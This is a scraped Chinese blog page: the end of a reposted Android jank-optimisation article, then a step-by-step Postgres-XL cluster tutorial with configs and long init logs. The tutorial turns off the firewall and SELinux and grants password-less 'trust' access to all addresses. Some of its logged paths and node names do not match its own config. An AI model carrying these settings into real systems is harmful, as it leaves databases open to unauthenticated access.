RecyclerView使用优化,使用DiffUtil和notifyItemDataSetChanged进行局部更新等。 5.对象分配和回收优化 自从Android引入 ART 并且在Android 5.0上成为默认的运行时之后,对象分配和垃圾回收(GC)造成的卡顿已经显著降低了,但是由于对象分配和GC有额外的开销,它依然又可能使线程负载过重。 在一个调用不频繁的地方(比如按钮点击)分配对象是没有问题的,但如果在在一个被频繁调用的紧密的循环里,就需要避免对象分配来降低GC的压力。 减少小对象的频繁分配和回收操作。 好了,关于卡顿优化的问题就讲到这里,下篇文章会对卡顿中的ANR情况的处理,这里做个铺垫。 如果喜欢我的文章,欢迎关注我的公众号。 点击这看原文链接: 参考 Android卡顿检测及优化 一文读懂直播卡顿优化那些事儿 “终于懂了” 系列:Android屏幕刷新机制—VSync、Choreographer 全面理解! 深入探索Android卡顿优化(上) 西瓜卡顿 & ANR 优化治理及监控体系建设 5376)] 参考 Android卡顿检测及优化 一文读懂直播卡顿优化那些事儿 “终于懂了” 系列:Android屏幕刷新机制—VSync、Choreographer 全面理解! 深入探索Android卡顿优化(上) 西瓜卡顿 & ANR 优化治理及监控体系建设 本篇文章为转载内容。原文链接:https://blog.csdn.net/yuhaibing111/article/details/127682399。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-03-26 08:05:57
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...供事务间一致性视图 部署GTM Proxy实例,以提高性能 Postgre-XL主要组件 GTM (Global Transaction Manager) - 全局事务管理器 GTM是Postgres-XL的一个关键组件,用于提供一致的事务管理和元组可见性控制。 GTM Standby GTM的备节点,在pgxc,pgxl中,GTM控制所有的全局事务分配,如果出现问题,就会导致整个集群不可用,为了增加可用性,增加该备用节点。当GTM出现问题时,GTM Standby可以升级为GTM,保证集群正常工作。 GTM-Proxy GTM需要与所有的Coordinators通信,为了降低压力,可以在每个Coordinator机器上部署一个GTM-Proxy。 Coordinator --协调器 协调器是应用程序到数据库的接口。它的作用类似于传统的PostgreSQL后台进程,但是协调器不存储任何实际数据。实际数据由数据节点存储。协调器接收SQL语句,根据需要获取全局事务Id和全局快照,确定涉及哪些数据节点,并要求它们执行(部分)语句。当向数据节点发出语句时,它与GXID和全局快照相关联,以便多版本并发控制(MVCC)属性扩展到集群范围。 Datanode --数据节点 用于实际存储数据。表可以分布在各个数据节点之间,也可以复制到所有数据节点。数据节点没有整个数据库的全局视图,它只负责本地存储的数据。接下来,协调器将检查传入语句,并制定子计划。然后,根据需要将这些数据连同GXID和全局快照一起传输到涉及的每个数据节点。数据节点可以在不同的会话中接收来自各个协调器的请求。但是,由于每个事务都是惟一标识的,并且与一致的(全局)快照相关联,所以每个数据节点都可以在其事务和快照上下文中正确执行。 Postgres-XL继承了PostgreSQL Postgres-XL是PostgreSQL的扩展并继承了其很多特性: 复杂查询 外键 触发器 视图 事务 MVCC(多版本控制) 此外,类似于PostgreSQL,用户可以通过多种方式扩展Postgres-XL,例如添加新的 数据类型 函数 操作 聚合函数 索引类型 过程语言 安装 环境说明 由于资源有限,gtm一台、另外两台身兼数职。 主机名 IP 角色 端口 nodename 数据目录 gtm 192.168.20.132 GTM 6666 gtm /nodes/gtm 协调器 5432 coord1 /nodes/coordinator xl1 192.168.20.133 数据节点 5433 node1 /nodes/pgdata gtm代理 6666 gtmpoxy01 /nodes/gtm_pxy1 协调器 5432 coord2 /nodes/coordinator xl2 192.168.20.134 数据节点 5433 node2 /nodes/pgdata gtm代理 6666 gtmpoxy02 /nodes/gtm_pxy2 要求 GNU make版本 3.8及以上版本 [root@pg ~] make --versionGNU Make 3.82Built for x86_64-redhat-linux-gnuCopyright (C) 2010 Free Software Foundation, Inc.License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>This is free software: you are free to change and redistribute it.There is NO WARRANTY, to the extent permitted by law. 需安装GCC包 需安装tar包 用于解压缩文件 默认需要GNU Readline library 其作用是可以让psql命令行记住执行过的命令,并且可以通过键盘上下键切换命令。但是可以通过--without-readline禁用这个特性,或者可以指定--withlibedit-preferred选项来使用libedit 默认使用zlib压缩库 可通过--without-zlib选项来禁用 配置hosts 所有主机上都配置 [root@xl2 11] cat /etc/hosts127.0.0.1 localhost192.168.20.132 gtm192.168.20.133 xl1192.168.20.134 xl2 关闭防火墙、Selinux 所有主机都执行 关闭防火墙: [root@gtm ~] systemctl stop firewalld.service[root@gtm ~] systemctl disable firewalld.service selinux设置: [root@gtm ~]vim /etc/selinux/config 设置SELINUX=disabled,保存退出。 This file controls the state of SELinux on the system. SELINUX= can take one of these three values: enforcing - SELinux security policy is enforced. permissive - SELinux prints warnings instead of enforcing. disabled - No SELinux policy is loaded.SELINUX=disabled SELINUXTYPE= can take one of three two values: targeted - Targeted processes are protected, minimum - Modification of targeted policy. Only selected processes are protected. mls - Multi Level Security protection. 安装依赖包 所有主机上都执行 yum install -y flex bison readline-devel zlib-devel openjade docbook-style-dsssl gcc 创建用户 所有主机上都执行 [root@gtm ~] useradd postgres[root@gtm ~] passwd postgres[root@gtm ~] su - postgres[root@gtm ~] mkdir ~/.ssh[root@gtm ~] chmod 700 ~/.ssh 配置SSH免密登录 仅仅在gtm节点配置如下操作: [root@gtm ~] su - postgres[postgres@gtm ~] ssh-keygen -t rsa[postgres@gtm ~] cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys[postgres@gtm ~] chmod 600 ~/.ssh/authorized_keys 将刚生成的认证文件拷贝到xl1到xl2中,使得gtm节点可以免密码登录xl1~xl2的任意一个节点: [postgres@gtm ~] scp ~/.ssh/authorized_keys postgres@xl1:~/.ssh/[postgres@gtm ~] scp ~/.ssh/authorized_keys postgres@xl2:~/.ssh/ 对所有提示都不要输入,直接enter下一步。直到最后,因为第一次要求输入目标机器的用户密码,输入即可。 下载源码 下载地址:https://www.postgres-xl.org/download/ [root@slave ~] ll postgres-xl-10r1.1.tar.gz-rw-r--r-- 1 root root 28121666 May 30 05:21 postgres-xl-10r1.1.tar.gz 编译、安装Postgres-XL 所有节点都安装,编译需要一点时间,最好同时进行编译。 [root@slave ~] tar xvf postgres-xl-10r1.1.tar.gz[root@slave ~] ./configure --prefix=/home/postgres/pgxl/[root@slave ~] make[root@slave ~] make install[root@slave ~] cd contrib/ --安装必要的工具,在gtm节点上安装即可[root@slave ~] make[root@slave ~] make install 配置环境变量 所有节点都要配置 进入postgres用户,修改其环境变量,开始编辑 [root@gtm ~]su - postgres[postgres@gtm ~]vi .bashrc --不是.bash_profile 在打开的文件末尾,新增如下变量配置: export PGHOME=/home/postgres/pgxlexport LD_LIBRARY_PATH=$PGHOME/lib:$LD_LIBRARY_PATHexport PATH=$PGHOME/bin:$PATH 按住esc,然后输入:wq!保存退出。输入以下命令对更改重启生效。 [postgres@gtm ~] source .bashrc --不是.bash_profile 输入以下语句,如果输出变量结果,代表生效 [postgres@gtm ~] echo $PGHOME 应该输出/home/postgres/pgxl代表生效 配置集群 生成pgxc_ctl.conf配置文件 [postgres@gtm ~] pgxc_ctl prepare/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxl/pgxc_ctl/pgxc_ctl_bash.ERROR: File "/home/postgres/pgxl/pgxc_ctl/pgxc_ctl.conf" not found or not a regular file. No such file or directoryInstalling pgxc_ctl_bash script as /home/postgres/pgxl/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxl/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxl/pgxc_ctl --configuration /home/postgres/pgxl/pgxc_ctl/pgxc_ctl.confFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxl/pgxc_ctl 配置pgxc_ctl.conf 新建/home/postgres/pgxc_ctl/pgxc_ctl.conf文件,编辑如下: 对着模板文件一个一个修改,否则会造成初始化过程出现各种神奇问题。 pgxcInstallDir=$PGHOMEpgxlDATA=$PGHOME/data pgxcOwner=postgres---- GTM Master -----------------------------------------gtmName=gtmgtmMasterServer=gtmgtmMasterPort=6666gtmMasterDir=$pgxlDATA/nodes/gtmgtmSlave=y Specify y if you configure GTM Slave. Otherwise, GTM slave will not be configured and all the following variables will be reset.gtmSlaveName=gtmSlavegtmSlaveServer=gtm value none means GTM slave is not available. Give none if you don't configure GTM Slave.gtmSlavePort=20001 Not used if you don't configure GTM slave.gtmSlaveDir=$pgxlDATA/nodes/gtmSlave Not used if you don't configure GTM slave.---- GTM-Proxy Master -------gtmProxyDir=$pgxlDATA/nodes/gtm_proxygtmProxy=y gtmProxyNames=(gtm_pxy1 gtm_pxy2) gtmProxyServers=(xl1 xl2) gtmProxyPorts=(6666 6666) gtmProxyDirs=($gtmProxyDir $gtmProxyDir) ---- Coordinators ---------coordMasterDir=$pgxlDATA/nodes/coordcoordNames=(coord1 coord2) coordPorts=(5432 5432) poolerPorts=(6667 6667) coordPgHbaEntries=(0.0.0.0/0)coordMasterServers=(xl1 xl2) coordMasterDirs=($coordMasterDir $coordMasterDir)coordMaxWALsernder=0 没设置备份节点,设置为0coordMaxWALSenders=($coordMaxWALsernder $coordMaxWALsernder) 数量保持和coordMasterServers一致coordSlave=n---- Datanodes ----------datanodeMasterDir=$pgxlDATA/nodes/dn_masterprimaryDatanode=xl1 主数据节点datanodeNames=(node1 node2)datanodePorts=(5433 5433) datanodePoolerPorts=(6668 6668) datanodePgHbaEntries=(0.0.0.0/0)datanodeMasterServers=(xl1 xl2)datanodeMasterDirs=($datanodeMasterDir $datanodeMasterDir)datanodeMaxWalSender=4datanodeMaxWALSenders=($datanodeMaxWalSender $datanodeMaxWalSender) 集群初始化,启动,停止 初始化 pgxc_ctl -c /home/postgres/pgxc_ctl/pgxc_ctl.conf init all 输出结果: /bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf/home/postgres/pgxc_ctl/pgxc_ctl.conf: line 189: $coordExtraConfig: ambiguous redirectFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlStopping all the coordinator masters.Stopping coordinator master coord1.Stopping coordinator master coord2.pg_ctl: directory "/home/postgres/pgxc/nodes/coord/coord1" does not existpg_ctl: directory "/home/postgres/pgxc/nodes/coord/coord2" does not existDone.Stopping all the datanode masters.Stopping datanode master datanode1.Stopping datanode master datanode2.pg_ctl: PID file "/home/postgres/pgxc/nodes/datanode/datanode1/postmaster.pid" does not existIs server running?Done.Stop GTM masterwaiting for server to shut down.... doneserver stopped[postgres@gtm ~]$ echo $PGHOME/home/postgres/pgxl[postgres@gtm ~]$ ll /home/postgres/pgxl/pgxc/nodes/gtm/gtm.^C[postgres@gtm ~]$ pgxc_ctl -c /home/postgres/pgxc_ctl/pgxc_ctl.conf init all/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf/home/postgres/pgxc_ctl/pgxc_ctl.conf: line 189: $coordExtraConfig: ambiguous redirectFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlInitialize GTM masterERROR: target directory (/home/postgres/pgxc/nodes/gtm) exists and not empty. Skip GTM initilializationDone.Start GTM masterserver startingInitialize all the coordinator masters.Initialize coordinator master coord1.ERROR: target coordinator master coord1 is running now. Skip initilialization.Initialize coordinator master coord2.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/coord/coord2 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.Done.Starting coordinator master.Starting coordinator master coord1ERROR: target coordinator master coord1 is already running now. Skip initialization.Starting coordinator master coord22019-05-30 21:09:25.562 EDT [2148] LOG: listening on IPv4 address "0.0.0.0", port 54322019-05-30 21:09:25.562 EDT [2148] LOG: listening on IPv6 address "::", port 54322019-05-30 21:09:25.563 EDT [2148] LOG: listening on Unix socket "/tmp/.s.PGSQL.5432"2019-05-30 21:09:25.601 EDT [2149] LOG: database system was shut down at 2019-05-30 21:09:22 EDT2019-05-30 21:09:25.605 EDT [2148] LOG: database system is ready to accept connections2019-05-30 21:09:25.612 EDT [2156] LOG: cluster monitor startedDone.Initialize all the datanode masters.Initialize the datanode master datanode1.Initialize the datanode master datanode2.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/datanode/datanode1 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/datanode/datanode2 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.Done.Starting all the datanode masters.Starting datanode master datanode1.WARNING: datanode master datanode1 is running now. Skipping.Starting datanode master datanode2.2019-05-30 21:09:33.352 EDT [2404] LOG: listening on IPv4 address "0.0.0.0", port 154322019-05-30 21:09:33.352 EDT [2404] LOG: listening on IPv6 address "::", port 154322019-05-30 21:09:33.355 EDT [2404] LOG: listening on Unix socket "/tmp/.s.PGSQL.15432"2019-05-30 21:09:33.392 EDT [2404] LOG: redirecting log output to logging collector process2019-05-30 21:09:33.392 EDT [2404] HINT: Future log output will appear in directory "pg_log".Done.psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"Done.psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"Done.[postgres@gtm ~]$ pgxc_ctl -c /home/postgres/pgxc_ctl/pgxc_ctl.conf stop all/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf/home/postgres/pgxc_ctl/pgxc_ctl.conf: line 189: $coordExtraConfig: ambiguous redirectFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlStopping all the coordinator masters.Stopping coordinator master coord1.Stopping coordinator master coord2.pg_ctl: directory "/home/postgres/pgxc/nodes/coord/coord1" does not existDone.Stopping all the datanode masters.Stopping datanode master datanode1.Stopping datanode master datanode2.pg_ctl: PID file "/home/postgres/pgxc/nodes/datanode/datanode1/postmaster.pid" does not existIs server running?Done.Stop GTM masterwaiting for server to shut down.... doneserver stopped[postgres@gtm ~]$ pgxc_ctl/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf/home/postgres/pgxc_ctl/pgxc_ctl.conf: line 189: $coordExtraConfig: ambiguous redirectFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlPGXC monitor allNot running: gtm masterRunning: coordinator master coord1Not running: coordinator master coord2Running: datanode master datanode1Not running: datanode master datanode2PGXC stop coordinator master coord1Stopping coordinator master coord1.pg_ctl: directory "/home/postgres/pgxc/nodes/coord/coord1" does not existDone.PGXC stop datanode master datanode1Stopping datanode master datanode1.pg_ctl: PID file "/home/postgres/pgxc/nodes/datanode/datanode1/postmaster.pid" does not existIs server running?Done.PGXC monitor allNot running: gtm masterRunning: coordinator master coord1Not running: coordinator master coord2Running: datanode master datanode1Not running: datanode master datanode2PGXC monitor allNot running: gtm masterNot running: coordinator master coord1Not running: coordinator master coord2Not running: datanode master datanode1Not running: datanode master datanode2PGXC exit[postgres@gtm ~]$ pgxc_ctl -c /home/postgres/pgxc_ctl/pgxc_ctl.conf init all/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf/home/postgres/pgxc_ctl/pgxc_ctl.conf: line 189: $coordExtraConfig: ambiguous redirectFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlInitialize GTM masterERROR: target directory (/home/postgres/pgxc/nodes/gtm) exists and not empty. Skip GTM initilializationDone.Start GTM masterserver startingInitialize all the coordinator masters.Initialize coordinator master coord1.Initialize coordinator master coord2.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/coord/coord1 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/coord/coord2 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.Done.Starting coordinator master.Starting coordinator master coord1Starting coordinator master coord22019-05-30 21:13:03.998 EDT [25137] LOG: listening on IPv4 address "0.0.0.0", port 54322019-05-30 21:13:03.998 EDT [25137] LOG: listening on IPv6 address "::", port 54322019-05-30 21:13:04.000 EDT [25137] LOG: listening on Unix socket "/tmp/.s.PGSQL.5432"2019-05-30 21:13:04.038 EDT [25138] LOG: database system was shut down at 2019-05-30 21:13:00 EDT2019-05-30 21:13:04.042 EDT [25137] LOG: database system is ready to accept connections2019-05-30 21:13:04.049 EDT [25145] LOG: cluster monitor started2019-05-30 21:13:04.020 EDT [2730] LOG: listening on IPv4 address "0.0.0.0", port 54322019-05-30 21:13:04.020 EDT [2730] LOG: listening on IPv6 address "::", port 54322019-05-30 21:13:04.021 EDT [2730] LOG: listening on Unix socket "/tmp/.s.PGSQL.5432"2019-05-30 21:13:04.057 EDT [2731] LOG: database system was shut down at 2019-05-30 21:13:00 EDT2019-05-30 21:13:04.061 EDT [2730] LOG: database system is ready to accept connections2019-05-30 21:13:04.062 EDT [2738] LOG: cluster monitor startedDone.Initialize all the datanode masters.Initialize the datanode master datanode1.Initialize the datanode master datanode2.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/datanode/datanode1 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/datanode/datanode2 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.Done.Starting all the datanode masters.Starting datanode master datanode1.Starting datanode master datanode2.2019-05-30 21:13:12.077 EDT [25392] LOG: listening on IPv4 address "0.0.0.0", port 154322019-05-30 21:13:12.077 EDT [25392] LOG: listening on IPv6 address "::", port 154322019-05-30 21:13:12.079 EDT [25392] LOG: listening on Unix socket "/tmp/.s.PGSQL.15432"2019-05-30 21:13:12.114 EDT [25392] LOG: redirecting log output to logging collector process2019-05-30 21:13:12.114 EDT [25392] HINT: Future log output will appear in directory "pg_log".2019-05-30 21:13:12.079 EDT [2985] LOG: listening on IPv4 address "0.0.0.0", port 154322019-05-30 21:13:12.079 EDT [2985] LOG: listening on IPv6 address "::", port 154322019-05-30 21:13:12.081 EDT [2985] LOG: listening on Unix socket "/tmp/.s.PGSQL.15432"2019-05-30 21:13:12.117 EDT [2985] LOG: redirecting log output to logging collector process2019-05-30 21:13:12.117 EDT [2985] HINT: Future log output will appear in directory "pg_log".Done.psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"Done.psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"Done. 启动 pgxc_ctl -c /home/postgres/pgxc_ctl/pgxc_ctl.conf start all 关闭 pgxc_ctl -c /home/postgres/pgxc_ctl/pgxc_ctl.conf stop all 查看集群状态 [postgres@gtm ~]$ pgxc_ctl monitor all/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf/home/postgres/pgxc_ctl/pgxc_ctl.conf: line 189: $coordExtraConfig: ambiguous redirectFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlRunning: gtm masterRunning: coordinator master coord1Running: coordinator master coord2Running: datanode master datanode1Running: datanode master datanode2 配置集群信息 分别在数据节点、协调器节点上分别执行以下命令: 注:本节点只执行修改操作即可(alert node),其他节点执行创建命令(create node)。因为本节点已经包含本节点的信息。 create node coord1 with (type=coordinator,host=xl1, port=5432);create node coord2 with (type=coordinator,host=xl2, port=5432);alter node coord1 with (type=coordinator,host=xl1, port=5432);alter node coord2 with (type=coordinator,host=xl2, port=5432);create node datanode1 with (type=datanode, host=xl1,port=15432,primary=true,PREFERRED);create node datanode2 with (type=datanode, host=xl2,port=15432);alter node datanode1 with (type=datanode, host=xl1,port=15432,primary=true,PREFERRED);alter node datanode2 with (type=datanode, host=xl2,port=15432);select pgxc_pool_reload(); 分别登陆数据节点、协调器节点验证 postgres= select from pgxc_node;node_name | node_type | node_port | node_host | nodeis_primary | nodeis_preferred | node_id-----------+-----------+-----------+-----------+----------------+------------------+-------------coord1 | C | 5432 | xl1 | f | f | 1885696643coord2 | C | 5432 | xl2 | f | f | -1197102633datanode2 | D | 15432 | xl2 | f | f | -905831925datanode1 | D | 15432 | xl1 | t | f | 888802358(4 rows) 测试 插入数据 在数据节点1,执行相关操作。 通过协调器端口登录PG [postgres@xl1 ~]$ psql -p 5432psql (PGXL 10r1.1, based on PG 10.6 (Postgres-XL 10r1.1))Type "help" for help.postgres= create database lei;CREATE DATABASEpostgres= \c lei;You are now connected to database "lei" as user "postgres".lei= create table test1(id int,name text);CREATE TABLElei= insert into test1(id,name) select generate_series(1,8),'测试';INSERT 0 8lei= select from test1;id | name----+------1 | 测试2 | 测试5 | 测试6 | 测试8 | 测试3 | 测试4 | 测试7 | 测试(8 rows) 注:默认创建的表为分布式表,也就是每个数据节点值存储表的部分数据。关于表类型具体说明,下面有说明。 通过15432端口登录数据节点,查看数据 有5条数据 [postgres@xl1 ~]$ psql -p 15432psql (PGXL 10r1.1, based on PG 10.6 (Postgres-XL 10r1.1))Type "help" for help.postgres= \c lei;You are now connected to database "lei" as user "postgres".lei= select from test1;id | name----+------1 | 测试2 | 测试5 | 测试6 | 测试8 | 测试(5 rows) 登录到节点2,查看数据 有3条数据 [postgres@xl2 ~]$ psql -p15432psql (PGXL 10r1.1, based on PG 10.6 (Postgres-XL 10r1.1))Type "help" for help.postgres= \c lei;You are now connected to database "lei" as user "postgres".lei= select from test1;id | name----+------3 | 测试4 | 测试7 | 测试(3 rows) 两个节点的数据加起来整个8条,没有问题。 至此Postgre-XL集群搭建完成。 创建数据库、表时可能会出现以下错误: ERROR: Failed to get pooled connections 是因为pg_hba.conf配置不对,所有节点加上host all all 192.168.20.0/0 trust并重启集群即可。 ERROR: No Datanode defined in cluster 首先确认是否创建了数据节点,也就是create node相关的命令。如果创建了则执行select pgxc_pool_reload();使其生效即可。 集群管理与应用 表类型说明 REPLICATION表:各个datanode节点中,表的数据完全相同,也就是说,插入数据时,会分别在每个datanode节点插入相同数据。读数据时,只需要读任意一个datanode节点上的数据。 建表语法: CREATE TABLE repltab (col1 int, col2 int) DISTRIBUTE BY REPLICATION; DISTRIBUTE :会将插入的数据,按照拆分规则,分配到不同的datanode节点中存储,也就是sharding技术。每个datanode节点只保存了部分数据,通过coordinate节点可以查询完整的数据视图。 CREATE TABLE disttab(col1 int, col2 int, col3 text) DISTRIBUTE BY HASH(col1); 模拟数据插入 任意登录一个coordinate节点进行建表操作 [postgres@gtm ~]$ psql -h xl1 -p 5432 -U postgrespostgres= INSERT INTO disttab SELECT generate_series(1,100), generate_series(101, 200), 'foo';INSERT 0 100postgres= INSERT INTO repltab SELECT generate_series(1,100), generate_series(101, 200);INSERT 0 100 查看数据分布结果: DISTRIBUTE表分布结果 postgres= SELECT xc_node_id, count() FROM disttab GROUP BY xc_node_id;xc_node_id | count ------------+-------1148549230 | 42-927910690 | 58(2 rows) REPLICATION表分布结果 postgres= SELECT count() FROM repltab;count -------100(1 row) 查看另一个datanode2中repltab表结果 [postgres@datanode2 pgxl9.5]$ psql -p 15432psql (PGXL 10r1.1, based on PG 10.6 (Postgres-XL 10r1.1))Type "help" for help.postgres= SELECT count() FROM repltab;count -------100(1 row) 结论:REPLICATION表中,datanode1,datanode2中表是全部数据,一模一样。而DISTRIBUTE表,数据散落近乎平均分配到了datanode1,datanode2节点中。 新增数据节点与数据重分布 在线新增节点、并重新分布数据。 新增datanode节点 在gtm集群管理节点上执行pgxc_ctl命令 [postgres@gtm ~]$ pgxc_ctl/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.confFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlPGXC 在服务器xl3上,新增一个master角色的datanode节点,名称是datanode3 端口号暂定5430,pool master暂定6669 